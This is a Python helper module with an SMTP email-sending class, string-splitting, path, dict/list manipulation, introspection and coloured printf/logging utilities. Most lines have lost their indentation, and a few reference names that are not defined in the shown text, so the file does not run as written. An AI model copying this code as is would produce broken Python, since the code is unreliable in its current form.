return string.replace('+','%2B').replace('?','%3F').replace('/','%2F').replace(':','%3A').replace('=','%3D').replace(' ','+')
return string
class EMAIL:
# Port Info
# GMAIL TTLS : 587
# Postfix : 25
def __init__(self,server='127.0.0.1',port=25,user=None,password=None,ssl=False,tls=False):
self.server=server
self.port=port
self.user=user
self.password=password
self.ssl=ssl
self.tls=tls
def Body(self,sender,receivers,title,msg,filename=None,html=False):
if isinstance(receivers,str):
receivers=receivers.split(',')
if not isinstance(receivers,list):
print('To mailing list issue')
return False
if filename:
_body=MIMEMultipart()
if isinstance(sender,tuple) and len(sender) == 2:
#format: ('NAME',EMAIL)
_body['From'] = email.utils.formataddr(sender)
else:
_body['From'] = sender
if isinstance(receivers[0],tuple) and len(receivers[0]) == 2:
#format: ('NAME',EMAIL)
_body['To'] = email.utils.formataddr(receivers[0])
else:
_body['To'] = receivers[0]
_body['Subject'] = title
if html:
_body.attach(MIMEText(msg, "html"))
else:
_body.attach(MIMEText(msg, "plain"))
with open(filename,'rb') as attachment:
part=MIMEBase("application", "octet-stream")
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header("Content-Disposition",f"attachment; filename= {filename}",)
_body.attach(part)
else:
if html:
_body=MIMEMultipart('alternative')
_body.attach(MIMEText(msg,'html'))
else:
_body = MIMEText(msg)
_body['Subject'] = title
if isinstance(sender,tuple) and len(sender) == 2:
#format: ('NAME',EMAIL)
_body['From'] = email.utils.formataddr(sender)
else:
_body['From'] = sender
if isinstance(receivers[0],tuple) and len(receivers[0]) == 2:
#format: ('NAME',EMAIL)
_body['To'] = email.utils.formataddr(receivers[0])
else:
_body['To'] = receivers[0]
return _body.as_string()
 def Server(self,sender=None): # sender is passed in from Send() as a login fallback
if self.ssl:
if not self.password:
print('It required mail server({}) login password'.format(self.server))
return False
context = ssl.create_default_context()
if self.user is None: self.user=sender
try:
server=smtplib.SMTP_SSL(self.server,self.port,context=context)
server.login(self.user, self.password)
except:
print('Login fail at the server({})'.format(self.server))
return False
else:
server=smtplib.SMTP(self.server,self.port)
if self.tls:
if not self.password:
print('It required mail server({}) login password'.format(self.server))
return False
if self.ssl:
context = ssl.create_default_context()
server.starttls(context=context)
else:
server.starttls()
if self.user is None: self.user=sender
server.login(self.user, self.password)
return server
#def Send(self,sender,receivers,title='Subject',msg='MSG',dbg=False,filename=None,html=False):
def Send(self,*receivers,**opts):
sender=opts.get('sender',opts.get('from','root@localhost'))
title=opts.get('title',opts.get('subject','Unknown Subject'))
msg=opts.get('msg',opts.get('body','No body'))
dbg=opts.get('dbg',False)
filename=opts.get('filename')
html=opts.get('html',False)
  server=self.Server(sender)
if not server: return False
if dbg: server.set_debuglevel(True)
if len(receivers) == 1 and isinstance(receivers[0],str):
receivers=receivers[0].split(',')
elif receivers:
receivers=list(receivers)
else:
   receivers=opts.get('to',opts.get('receivers',opts.get('recievers'))) # old misspelled key kept for compatibility
if isinstance(receivers,str):
receivers=receivers.split(',')
elif isinstance(receivers,tuple) and len(receivers) == 2 and isinstance(receivers[0],str) and '@' not in receivers[0]:
receivers=[receivers]
email_body=self.Body(sender,receivers,title,msg,filename=filename,html=html)
if email_body:
try:
server.sendmail(sender, receivers, email_body)
server.quit()
return True
except:
return False
else:
   print('something wrong with the input')
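 # EMAIL usage sketch (hypothetical server and addresses):
 #   EMAIL(server='smtp.example.com',port=587,user='me@example.com',
 #         password='secret',tls=True).Send('you@example.com',
 #         sender='me@example.com',title='Report',msg='Hello',filename='/tmp/report.csv')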
####################################STRING##################################################
def Cut(src,head_len=None,body_len=None,new_line='\n',out=str):
if not isinstance(src,str): return False
# if not isinstance(src,str):
# src='''{}'''.format(src)
source=src.split(new_line)
 if (len(source) == 1 and not head_len) or (head_len and head_len >= len(src)):
  return [src]
rt=[]
for src_idx in range(0,len(source)):
str_len=len(source[src_idx])
if not body_len:
rt=rt+[source[src_idx][i:i + head_len] for i in range(0, str_len, head_len)]
else:
if src_idx == 0:
rt.append(source[src_idx][0:head_len]) # Take head
if str_len > head_len:
rt=rt+[source[src_idx][head_len:][i:i + body_len] for i in range(0, str_len-head_len, body_len)]
## Cut body
#string_tmp=self.src[head_len:]
#string_tmp_len=len(string_tmp)
#for i in range(0, int(string_tmp_len/body_len)+1):
# if (i+1)*body_len > string_tmp_len:
# rt.append(string_tmp[body_len*i:])
# else:
# rt.append(string_tmp[body_len*i:(i+1)*body_len])
else:
rt=rt+[source[src_idx][i:i + body_len] for i in range(0, str_len, body_len)]
if rt and out in ['str',str]: return new_line.join(rt)
return rt
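# Cut() sketch: split a string into fixed-width chunks per line, e.g.
#   Cut('abcdefgh',head_len=3,out=list)            -> ['abc','def','gh']
#   Cut('abcdefgh',head_len=2,body_len=3,out=list) -> ['ab','cde','fgh']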
def cut_string(string,max_len=None,sub_len=None,new_line='\n',front_space=False,out_format=list):
rc=[]
if not isinstance(string,str):
string='{0}'.format(string)
if new_line:
string_a=string.split(new_line)
else:
string_a=[string]
 if max_len is None:
if new_line and out_format in [str,'str','string']:
return string
return [string]
max_num=len(string_a)
space=''
if sub_len and front_space:
for ii in range(0,max_len-sub_len):
space=space+' '
elif sub_len is None:
sub_len=max_len
for ii in range(0,max_num):
str_len=len(string_a[ii])
if max_num == 1:
if max_len is None or max_len >= str_len:
if new_line and out_format in [str,'str','string']:
return string_a[ii]
return [string_a[ii]]
if sub_len is None:
rc=[string_a[i:i + max_len] for i in range(0, str_len, max_len)]
if new_line and out_format in [str,'str','string']:
return new_line.join(rc)
return rc
rc.append(string_a[ii][0:max_len])
string_tmp=string_a[ii][max_len:]
string_tmp_len=len(string_tmp)
if string_tmp_len > 0:
for i in range(0, (string_tmp_len//sub_len)+1):
if (i+1)*sub_len > string_tmp_len:
rc.append(space+string_tmp[sub_len*i:])
else:
rc.append(space+string_tmp[sub_len*i:(i+1)*sub_len])
# else:
# rc.append('')
if new_line and out_format in [str,'str','string']:
return new_line.join(rc)
return rc
def Path(*inp,**opts):
sym=opts.get('sym','/')
out=opts.get('out','str')
if inp:
full_path=[]
if isinstance(inp[0],str):
root_a=inp[0].split(sym)
if len(root_a):
if root_a[0] == '~':
full_path=os.environ['HOME'].split(sym)
else:
full_path=[root_a[0]]
for zz in range(1,len(root_a)):
if full_path and not root_a[zz]: continue
full_path.append(root_a[zz])
for ii in inp[1:]:
if isinstance(ii,str):
for zz in ii.split(sym):
if full_path and not zz: continue
if zz == '.': continue
if full_path and full_path[-1] != '..' and zz == '..':
del full_path[-1]
continue
full_path.append(zz)
if full_path:
if out in [str,'str']:return sym.join(full_path)
return full_path
return os.path.dirname(os.path.abspath(__file__)) # Not input then get current path
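# Path() sketch: join and normalize path fragments, e.g.
#   Path('/a/b','c/./d')   -> '/a/b/c/d'
#   Path('~','x','..','y') -> $HOME + '/y'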
####################################KEYS##################################################
def Get(*inps,**opts):
key=None
if len(inps) >= 2:
src=inps[0]
key=inps[1:]
elif len(inps) == 1:
src=inps[0]
key=opts.get('key',None)
if isinstance(key,list):
key=tuple(key)
elif key is not None:
key=(key,)
else: #None key
return GET(src).Value(**opts)
return GET(src).Value(*key,**opts)
def krc(rt,chk='_',rtd={'GOOD':[True,'True','Good','Ok','Pass',{'OK'},0],'FAIL':[False,'False','Fail',{'FAL'}],'NONE':[None,'None','N/A',{'NA'}],'IGNO':['IGNO','Ignore',{'IGN'}],'ERRO':['ERR','Error','error','erro','ERRO',{'ERR'}],'WARN':['Warn','warn',{'WAR'}],'UNKN':['Unknown','UNKN',{'UNK'}],'JUMP':['Jump',{'JUMP'}],'TOUT':['timeout','TimeOut','time out','Time Out','TMOUT','TOUT',{'TOUT'}],'REVD':['cancel','Cancel','CANCEL','REV','REVD','Revoked','revoked','revoke','Revoke',{'REVD'}],'LOST':['lost','connection lost','Connection Lost','Connection lost','CONNECTION LOST',{'LOST'}]},default=False):
def trans(irt):
type_irt=type(irt)
for ii in rtd:
for jj in rtd[ii]:
if type(jj) == type_irt and ((type_irt is str and jj.lower() == irt.lower()) or jj == irt):
return ii
return 'UNKN'
rtc=Get(rt,'0|rc',out='raw',err='ignore',check=(list,tuple,dict))
nrtc=trans(rtc)
if chk != '_':
if not isinstance(chk,list): chk=[chk]
for cc in chk:
if trans(cc) == nrtc:
return True
if nrtc == 'UNKN' and default == 'org':
return rtc
if default == 'org': return rt
return default
return nrtc
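# krc() sketch: normalize assorted return-code spellings to one class, or test against one
# (illustrative; assumes Get() pulls item 0 / key 'rc' from containers and passes plain values through):
#   krc(True)           -> 'GOOD'
#   krc(('Fail','msg')) -> 'FAIL'
#   krc('Error','GOOD') -> False   (check mode: classes do not match)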
def Delete(*inps,**opts):
if len(inps) >= 2:
obj=inps[0]
keys=inps[1:]
elif len(inps) == 1:
obj=inps[0]
keys=opts.get('key',None)
if isinstance(keys,list):
keys=tuple(keys)
elif keys is not None:
keys=(keys,)
default=opts.get('default',None)
_type=opts.get('type','index')
if isinstance(obj,(list,tuple)):
nobj=len(obj)
rt=[]
if _type == 'index':
nkeys=Abs(*tuple(keys),obj=obj,out=list)
for i in range(0,len(obj)):
if i not in nkeys:
rt.append(obj[i])
else:
for i in obj:
if i not in keys:
rt.append(i)
return rt
elif isinstance(obj,dict):
if isinstance(keys,(list,tuple,dict)):
for key in keys:
obj.pop(key,default)
else:
obj.pop(keys,default)
return obj
elif isinstance(obj,str):
nkeys=[]
for i in keys:
if isinstance(i,(tuple,str,int)):
tt=Abs(i,obj=obj,out=list)
if tt:
nkeys=nkeys+tt
rt=''
for i in range(0,len(obj)):
if i in nkeys:
continue
rt=rt+obj[i]
return rt
return default
def Replace(src,replace_what,replace_to,default=None):
if isinstance(src,str):
if replace_what[-1] == '$' or replace_what[0] == '^':
return re.sub(replace_what, replace_to, src)
else:
head, _sep, tail = src.rpartition(replace_what)
return head + replace_to + tail
if default == {'org'}: return src
return default
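# Replace() sketch: regex when anchored with ^/$, otherwise replaces the LAST occurrence:
#   Replace('a.b.c','.','/')           -> 'a.b/c'
#   Replace('foo.log','\.log$','.txt') -> 'foo.txt'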
def Insert(src,*inps,**opts):
start=opts.pop('at',0)
default=opts.pop('default',False)
err=opts.pop('err',False)
force=opts.pop('force',False)
uniq=opts.pop('uniq',False)
if isinstance(src,(list,tuple,str)):
tuple_out=False
if isinstance(src,tuple) and force:
src=list(src)
tuple_out=True
if uniq:
new=[]
for ii in inps:
if ii not in src:
new.append(ii)
inps=tuple(new)
  if isinstance(start,str):
   if start in ['start','first']: src=list(inps)+src
   if start in ['end','last']: src=src+list(inps)
elif len(src) == 0:
src=list(inps)
elif isinstance(start,int) and len(src) > start:
src=src[:start]+list(inps)+src[start:]
else:
if err:
return default
src=src+list(inps)
if tuple_out: return tuple(src)
elif isinstance(src,dict):
for ii in inps:
if isinstance(ii,dict):
src.update(ii)
if opts:
src.update(opts)
return src
def FirstKey(src,default=None):
if src:
if isinstance(src,(list,tuple)): return 0
try:
return next(iter(src))
except:
return default
return default
####################################FUNCTION##################################################
class FUNCTION:
def __init__(self,func=None):
if func:
if isinstance(func,str):
func=Global(func)
self.func=func
def Name(self):
return traceback.extract_stack(None, 2)[0][2]
def ParentName(self):
return traceback.extract_stack(None, 3)[0][2]
def Args(self,func=None,mode='defaults'):
if func is None: func=self.func
rc={}
  try:
   args, varargs, keywords, defaults = inspect.getfullargspec(func)[:4] # Python 3 (getargspec was removed in 3.11)
  except AttributeError:
   args, varargs, keywords, defaults = inspect.getargspec(func) # Python 2 fallback
if defaults is not None:
defaults=dict(zip(args[-len(defaults):], defaults))
del args[-len(defaults):]
rc['defaults']=defaults
if args:
rc['args']=args
if varargs:
rc['varargs']=varargs
if keywords:
rc['keywards']=keywords
if mode in ['*','all']:
return rc
if mode in rc:
return rc[mode]
def List(self,obj=None):
aa={}
if isinstance(obj,str):
   obj=sys.modules.get(obj)
if obj is not None:
for name,fobj in inspect.getmembers(obj):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.update({name:fobj})
return aa
def CallerName(self,detail=False):
try:
dep=len(inspect.stack())-2
if detail:
return sys._getframe(dep).f_code.co_name,sys._getframe(dep).f_lineno,sys._getframe(dep).f_code.co_filename
else:
name=sys._getframe(dep).f_code.co_name
if name == '_bootstrap_inner' or name == '_run_code':
return sys._getframe(3).f_code.co_name
return name
except:
return False
def Is(self,find=None,src=None):
if find is None: find=self.func
if src is None:
if isinstance(find,str):
#find=sys.modules.get(find)
find=Global().get(find)
return inspect.isfunction(find)
aa=[]
if not isinstance(find,str): find=find.__name__
if isinstance(src,str):
src=sys.modules.get(src)
if inspect.ismodule(src) or inspect.isclass(src):
for name,fobj in inspect.getmembers(src):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
else:
for name,fobj in inspect.getmembers(src):
if inspect.ismethod(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
if find in aa: return True
return False
def argtype(arg,want='_',get_data=['_']):
type_arg=type(arg)
if want in get_data:
if type_arg.__name__ == 'Request':
return arg.method.lower()
return type_arg.__name__.lower()
if type(want) is str:
if type_arg.__name__ == 'Request':
if want.upper() == 'REQUEST' or want.upper() == arg.method:
return True
return False
else:
if type_arg.__name__.lower() == want.lower():
return True
else:
if type_arg == want:
return True
return False
def get_function_name():
return traceback.extract_stack(None, 2)[0][2]
def get_pfunction_name():
return traceback.extract_stack(None, 3)[0][2]
def get_function_args(func,mode='defaults'):
rc={}
 try:
  args, varargs, keywords, defaults = inspect.getfullargspec(func)[:4] # Python 3 (getargspec was removed in 3.11)
 except AttributeError:
  args, varargs, keywords, defaults = inspect.getargspec(func) # Python 2 fallback
if defaults is not None:
defaults=dict(zip(args[-len(defaults):], defaults))
del args[-len(defaults):]
rc['defaults']=defaults
if args:
rc['args']=args
if varargs:
rc['varargs']=varargs
if keywords:
rc['keywards']=keywords
if mode in ['*','all']:
return rc
if mode in rc:
return rc[mode]
def get_function_list(objName=None,obj=None):
aa={}
if obj is None and objName is not None:
obj=sys.modules[objName]
if obj is not None:
for name,fobj in inspect.getmembers(obj):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.update({name:fobj})
return aa
def get_caller_fcuntion_name(detail=False):
try:
dep=len(inspect.stack())-2
if detail:
return sys._getframe(dep).f_code.co_name,sys._getframe(dep).f_lineno,sys._getframe(dep).f_code.co_filename
else:
name=sys._getframe(dep).f_code.co_name
if name == '_bootstrap_inner' or name == '_run_code':
return sys._getframe(3).f_code.co_name
return name
except:
return False
def is_function(find,src=None):
if src is None:
if isinstance(find,str):
find=sys.modules.get(find)
return inspect.isfunction(find)
aa=[]
if not isinstance(find,str): find=find.__name__
if isinstance(src,str):
src=sys.modules.get(src)
if inspect.ismodule(src) or inspect.isclass(src):
for name,fobj in inspect.getmembers(src):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
else:
for name,fobj in inspect.getmembers(src):
if inspect.ismethod(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
if find in aa: return True
return False
def code_error(email_func=None,email=None,email_title=None,email_server=None,log=None,log_msg='',default=None):
e=sys.exc_info()[0]
er=traceback.format_exc()
if log_msg:
log_msg='{}\n\n*SYS ERR:\n{}\n\n*FORM ERR:\n{}'.format(log_msg,e,er)
else:
log_msg='*SYS ERR:\n{}\n\n*FORM ERR:\n{}'.format(e,er)
if log: log('\n!!ERROR!!: {}'.format(log_msg),log_level=1)
if email_func and email and email_title:
a=email_func(email,email_title,log_msg,dj_ip=email_server)
TIME().Sleep(5)
return default
def printf(*msg,**opts):
log_p=False
log=opts.get('log',None)
log_level=opts.get('log_level',8)
dsp=opts.get('dsp','a')
func_name=opts.get('func_name',None)
date=opts.get('date',False)
date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
intro=opts.get('intro',None)
caller=opts.get('caller',False)
caller_detail=opts.get('caller_detail',False)
msg=list(msg)
direct=opts.get('direct',False)
color=opts.get('color',None)
color_db=opts.get('color_db',{'blue': 34, 'grey': 30, 'yellow': 33, 'green': 32, 'cyan': 36, 'magenta': 35, 'white': 37, 'red': 31})
bg_color=opts.get('bg_color',None)
bg_color_db=opts.get('bg_color_db',{'cyan': 46, 'white': 47, 'grey': 40, 'yellow': 43, 'blue': 44, 'magenta': 45, 'red': 41, 'green': 42})
attr=opts.get('attr',None)
attr_db=opts.get('attr_db',{'reverse': 7, 'blink': 5,'concealed': 8, 'underline': 4, 'bold': 1})
syslogd=opts.get('syslogd',None)
if direct:
new_line=opts.get('new_line','')
else:
new_line=opts.get('new_line','\n')
logfile=opts.get('logfile',None)
logfile_type=type(logfile)
if logfile_type is str:
logfile=logfile.split(',')
elif logfile_type in [list,tuple]:
logfile=list(logfile)
else:
logfile=[]
 for ii in msg[:]: # iterate over a copy; matched entries are removed from msg below
if type(ii) is str and ':' in ii:
logfile_list=ii.split(':')
if logfile_list[0] in ['log_file','logfile']:
if len(logfile_list) > 2:
for jj in logfile_list[1:]:
logfile.append(jj)
else:
logfile=logfile+logfile_list[1].split(',')
msg.remove(ii)
 if os.getenv('ANSI_COLORS_DISABLED') is None and (color or bg_color or attr):
  reset='''\033[0m'''
  fmt_msg='''\033[%dm%s'''
  # msg is still a list of message parts here, so color each part (bg lookup fixed to bg_color_db)
  if color and color in color_db:
   msg=[fmt_msg % (color_db[color],m) for m in msg]
  if bg_color and bg_color in bg_color_db:
   msg=[fmt_msg % (bg_color_db[bg_color],m) for m in msg]
  if attr and attr in attr_db:
   msg=[fmt_msg % (attr_db[attr],m) for m in msg]
  msg=['{}{}'.format(m,reset) for m in msg]
# Make a Intro
intro_msg=''
 if date and not syslogd:
  intro_msg='{0} '.format(datetime.now().strftime(date_format)) # date_format already carries its own brackets
if caller:
call_name=get_caller_fcuntion_name(detail=caller_detail)
if call_name:
if len(call_name) == 3:
intro_msg=intro_msg+'{}({}:{}): '.format(call_name[0],call_name[1],call_name[2])
else:
intro_msg=intro_msg+'{}(): '.format(call_name)
if intro is not None:
intro_msg=intro_msg+intro+': '
# Make a Tap
tap=''
for ii in range(0,len(intro_msg)):
tap=tap+' '
# Make a msg
msg_str=''
for ii in msg:
if msg_str:
if new_line:
msg_str=msg_str+new_line+tap+'{}'.format(ii)
else:
msg_str=msg_str+'{}'.format(ii)
else:
msg_str=intro_msg+'{}'.format(ii)
# save msg to syslogd
 if syslogd:
  if syslogd in ['INFO','info']:
   syslog.syslog(syslog.LOG_INFO,msg_str)
  elif syslogd in ['KERN','kern']:
   syslog.syslog(syslog.LOG_KERN,msg_str)
  elif syslogd in ['ERR','err']:
   syslog.syslog(syslog.LOG_ERR,msg_str)
  elif syslogd in ['CRIT','crit']:
   syslog.syslog(syslog.LOG_CRIT,msg_str)
  elif syslogd in ['WARN','warn']:
   syslog.syslog(syslog.LOG_WARNING,msg_str)
  elif syslogd in ['DBG','DEBUG','dbg','debug']:
   syslog.syslog(syslog.LOG_DEBUG,msg_str)
  else:
   syslog.syslog(msg_str)
# Save msg to file
if type(logfile) is str:
logfile=logfile.split(',')
if type(logfile) in [list,tuple] and ('f' in dsp or 'a' in dsp):
for ii in logfile:
if ii and os.path.isdir(os.path.dirname(ii)):
log_p=True
with open(ii,'a+') as f:
f.write(msg_str+new_line)
#if type(log).__name__ == 'function':
if Type(log,'function'):
log_func_arg=get_function_args(log,mode='all')
if 'args' in log_func_arg or 'varargs' in log_func_arg:
log_p=True
args=log_func_arg.get('args',[])
if args and len(args) <= 4 and ('direct' in args or 'log_level' in args or 'func_name' in args):
tmp=[]
for i in range(0,len(args)):
tmp.append(i)
if 'direct' in args:
didx=args.index('direct')
del tmp[didx]
args[didx]=direct
if 'log_level' in args:
lidx=args.index('log_level')
del tmp[lidx]
args[lidx]=log_level
if 'func_name' in args:
lidx=args.index('func_name')
del tmp[lidx]
args[lidx]=func_name
if 'date_format' in args:
lidx=args.index('date_format')
del tmp[lidx]
args[lidx]=date_format
args[tmp[0]]=msg_str
log(*args)
elif 'keywards' in log_func_arg:
log(msg_str,direct=direct,log_level=log_level,func_name=func_name,date_format=date_format)
elif 'defaults' in log_func_arg:
if 'direct' in log_func_arg['defaults'] and 'log_level' in log_func_arg['defaults']:
log(msg_str,direct=direct,log_level=log_level)
elif 'log_level' in log_func_arg['defaults']:
log(msg_str,log_level=log_level)
elif 'direct' in log_func_arg['defaults']:
log(msg_str,direct=direct)
else:
log(msg_str)
else:
log(msg_str)
# print msg to screen
if (log_p is False and 'a' in dsp) or 's' in dsp or 'e' in dsp:
if 'e' in dsp:
sys.stderr.write(msg_str+new_line)
sys.stderr.flush()
else:
sys.stdout.write(msg_str+new_line)
sys.stdout.flush()
# return msg
if 'r' in dsp:
return msg_str
def printf2(*msg,**opts):
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
color_db=opts.get('color_db',{'blue': 34, 'grey': 30, 'yellow': 33, 'green': 32, 'cyan': 36, 'magenta': 35, 'white': 37, 'red': 31})
bg_color_db=opts.get('bg_color_db',{'cyan': 46, 'white': 47, 'grey': 40, 'yellow': 43, 'blue': 44, 'magenta': 45, 'red': 41, 'green': 42})
attr_db=opts.get('attr_db',{'reverse': 7, 'blink': 5,'concealed': 8, 'underline': 4, 'bold': 1})
dsp=opts.get('dsp','s')
limit=opts.get('limit',None)
if isinstance(limit,int):
level=opts.get('level',1)
if limit < level:
return
if not isinstance(dsp,str):
dsp='s'
filename=opts.get('filename',None)
color=opts.get('color',None)
bgcolor=opts.get('bgcolor',None)
color_mode=opts.get('color_mode','shell')
wrap=opts.get('wrap',None)
length=opts.get('length',None)
form=opts.get('form',False)
if opts.get('direct',False):
new_line=''
start_new_line=''
else:
start_new_line=opts.get('start_new_line','')
new_line=opts.get('new_line','\n')
filename=opts.get('filename',None)
msg_str=''
for ii in msg:
if msg_str:
msg_str='''{}{}{}'''.format(msg_str,new_line,ii)
else:
msg_str='''{}'''.format(ii)
#New line
if new_line:
msg_str=msg_str.split(new_line)
# Cut each line
if isinstance(length,int):
length=(length,)
if isinstance(length,(tuple,list)):
new_msg_str=[]
if len(length) == 1:
for mm in range(0,len(msg_str)):
new_msg_str=new_msg_str+STR(msg_str[mm]).Cut(head_len=length[0])
elif len(length) == 2 and len(msg_str):
new_msg_str=new_msg_str+STR(msg_str[0]).Cut(head_len=length[0],body_len=length[1])
if len(msg_str) > 1:
for mm in range(1,len(msg_str)):
new_msg_str=new_msg_str+STR(msg_str[mm]).Cut(head_len=length[1])
msg_str=new_msg_str
# wrap each line
if isinstance(wrap,int):
wrap=(wrap,)
  if isinstance(wrap,(tuple,list)):
   # wrap entries are used as line prefixes (an int means that many spaces); 'tap' was undefined here
   tap=[' '*w if isinstance(w,int) else w for w in wrap]
   if len(wrap) == 1:
    for mm in range(0,len(msg_str)):
     msg_str[mm]=tap[0]+msg_str[mm]
   elif len(wrap) == 2 and len(msg_str):
    msg_str[0]=tap[0]+msg_str[0]
    if len(msg_str) > 1:
     for mm in range(1,len(msg_str)):
      msg_str[mm]=tap[1]+msg_str[mm]
msg_str=new_line.join(msg_str)
if color in ['clear','clean','remove','del','delete','mono']:
if color_mode == 'shell':
msg_str=ansi_escape.sub('',msg_str)
elif color:
msg_str=COLOR().String(msg_str,color,bg=False,attr=False,mode=color_mode)
elif bgcolor:
msg_str=COLOR().String(msg_str,bgcolor,bg=True,mode=color_mode)
# return msg
 if 'f' in dsp:
  if isinstance(filename,(str,list,tuple)):
   if isinstance(filename,str):filename=filename.split(',')
   filemode=opts.get('filemode','a+') # 'filemode' was undefined; default to append
   for ff in filename:
    if GET(ff).Dirname():
     with open(ff,filemode) as f:
      f.write(msg_str+new_line)
else:
dsp=dsp+'s' # if nothing filename then display it on screen
if 's' in dsp or 'a' in dsp:
if form:
try:
msg_str=ast.literal_eval(msg_str)
pprint(msg_str)
except:
sys.stdout.write(start_new_line+msg_str+new_line)
sys.stdout.flush()
else:
sys.stdout.write(start_new_line+msg_str+new_line)
sys.stdout.flush()
if 'e' in dsp:
sys.stderr.write(start_new_line+msg_str+new_line)
sys.stderr.flush()
if 'r' in dsp:
if form:
try:
return ast.literal_eval(msg_str)
except:
return start_new_line+msg_str+new_line
else:
return start_new_line+msg_str+new_line
def sprintf(string,*inps,**opts):
if not isinstance(string,str): return False,string
#"""ipmitool -H %(ipmi_ip)s -U %(ipmi_user)s -P '%(ipmi_pass)s' """%(**opts)
#"""{app} -H {ipmi_ip} -U {ipmi_user} -P '{ipmi_pass}' """.format(**opts)
#"""{} -H {} -U {} -P '{}' """.format(*inps)
#"""{0} -H {1} -U {2} -P '{3}' """.format(*inps)
    ffall=[re.compile(r'\{(\d*)\}').findall(string),re.compile(r'\{(\w*)\}').findall(string),re.compile(r'\%\((\w*)\)s').findall(string),re.compile(r'\{\}').findall(string)]
i=0
for tmp in ffall:
if i in [0,1]: tmp=[ j for j in tmp if len(j) ]
if tmp:
if i == 0:
mx=0
for z in tmp:
if int(z) > mx: mx=int(z)
                if inps:
                    if len(inps) > mx: return True,string.format(*inps)
                elif opts:
                    if len(opts) > mx: return True,string.format(*opts.values())
                return False,"Need more input (tuple/list) parameters(require {})".format(mx)
elif 0< i < 2:
new_str=''
string_a=string.split()
oidx=0
for ii in tmp:
idx=None
if '{%s}'%(ii) in string_a:
idx=string_a.index('{%s}'%(ii))
elif "'{%s}'"%(ii) in string_a:
idx=string_a.index("'{%s}'"%(ii))
if isinstance(idx,int):
if ii in opts:
string_a[idx]=string_a[idx].format(**opts)
elif ii in opts:
for jj in range(0,len(string_a)):
if '{%s}'%(ii) in string_a[jj]:
string_a[jj]=string_a[jj].format(**opts)
return True,' '.join(string_a)
elif i == 2:
new_str=''
string_a=string.split()
oidx=0
for ii in tmp:
idx=None
if '%({})s'.format(ii) in string_a:
idx=string_a.index('%({})s'.format(ii))
elif "'%({})'".format(ii) in string_a:
idx=string_a.index("'%({})s'".format(ii))
if isinstance(idx,int):
if ii in opts:
string_a[idx]=string_a[idx]%(opts)
elif ii in opts:
for jj in range(0,len(string_a)):
if '%({})s'.format(ii) in string_a[jj]:
string_a[jj]=string_a[jj]%(opts)
return True,' '.join(string_a)
elif i == 3:
if inp:
                    if len(tmp) == len(inps): return True,string.format(*inps)
                    return False,"Mismatched input (tuple/list) number (require:{}, input:{})".format(len(tmp),len(inps))
                elif opts:
                    if len(tmp) == len(opts): return True,string.format(*opts.values())
                    return False,"Mismatched input (tuple/list) number (require:{}, input:{})".format(len(tmp),len(opts))
i+=1
return True,string
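# Usage sketch for sprintf() (illustrative comment only):
#   sprintf('ping {host} -c {count}',host='10.0.0.1',count=3)
#       -> (True, 'ping 10.0.0.1 -c 3')      named {key} placeholders from **opts
#   sprintf('{0} -H {1}','ipmitool','10.1.1.1')
#       -> (True, 'ipmitool -H 10.1.1.1')    indexed {N} placeholders from *inps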
def format_print(string,rc=False,num=0,bstr=None,NFLT=False):
string_type=type(string)
rc_str=''
chk=None
bspace=space(num)
# Start Symbol
if string_type is tuple:
if bstr is None:
if NFLT:
rc_str='%s('%(rc_str)
else:
rc_str='%s%s('%(bspace,rc_str)
else:
rc_str='%s,\n%s%s('%(bstr,bspace,rc_str)
elif string_type is list:
if bstr is None:
if NFLT:
rc_str='%s['%(rc_str)
else:
rc_str='%s%s['%(bspace,rc_str)
else:
rc_str='%s,\n%s%s['%(bstr,bspace,rc_str)
elif string_type is dict:
if bstr is None:
rc_str='%s{'%(rc_str)
else:
rc_str='%s,\n%s %s{'%(bstr,bspace,rc_str)
rc_str='%s\n%s '%(rc_str,bspace)
# Print string
if string_type is list or string_type is tuple:
for ii in list(string):
ii_type=type(ii)
if ii_type is tuple or ii_type is list or ii_type is dict:
if not ii_type is dict:
num=num+1
rc_str=format_print(ii,num=num,bstr=rc_str,rc=True)
else:
if chk == None:
rc_str='%s%s'%(rc_str,STR(str_format_print(ii,rc=True)).Tap())
chk='a'
else:
rc_str='%s,\n%s'%(rc_str,STR(str_format_print(ii,rc=True)).Tap(space=bspace+' '))
elif string_type is dict:
for ii in string.keys():
ii_type=type(string[ii])
if ii_type is dict or ii_type is tuple or ii_type is list:
num=num+1
if ii_type is dict:
tmp=format_print(string[ii],num=num,rc=True)
else:
tmp=format_print(string[ii],num=num,rc=True,NFLT=True)
rc_str="%s,\n%s %s:%s"%(rc_str,bspace,str_format_print(ii,rc=True),tmp)
else:
if chk == None:
rc_str='%s%s'%(rc_str,STR("{0}:{1}".format(str_format_print(ii,rc=True),str_format_print(string[ii],rc=True))).Tap())
chk='a'
else:
rc_str='%s,\n%s'%(rc_str,STR("{0}:{1}".format(str_format_print(ii,rc=True),str_format_print(string[ii],rc=True))).Tap(space=bspace+' '))
# End symbol
if string_type is tuple:
rc_str='%s\n%s)'%(rc_str,bspace)
elif string_type is list:
rc_str='%s\n%s]'%(rc_str,bspace)
elif string_type is dict:
if bstr is None:
rc_str='%s\n%s}'%(rc_str,bspace)
else:
rc_str='%s\n%s }'%(rc_str,bspace)
else:
rc_str=string
# Output
if rc:
return rc_str
else:
print(rc_str)
def format_string(string,inps):
cmd=''
if isinstance(string,dict):
cmd=string['cmd']
string=string['base']
type_inps=type(inps)
if type_inps is dict:
if '%(' in string:
if '%s' in string:
return False,"name placehoder can't get %s format"
try:
return True,string % inps + ' '+cmd
except:
return False,"""string:{} input:{}""".format(string,inps)
        elif re.compile(r'{(\w.*)}').findall(string):
            if re.compile(r'{\d*}').findall(string):
                return False,"name placeholder can't get {} format"
            return True,string.format(**inps) + ' '+cmd
else:
if '%s' in string and type_inps in [tuple,list]:
if '%(' in string:
return False,"%s format string can't get name placeholder format"
return True,string % tuple(inps) + ' '+cmd
        elif re.compile(r'{\d*}').findall(string) and type_inps in [tuple,list]:
            if re.compile(r'{(\w.*)}').findall(string):
                return False,"{} format string can't get name placeholder format"
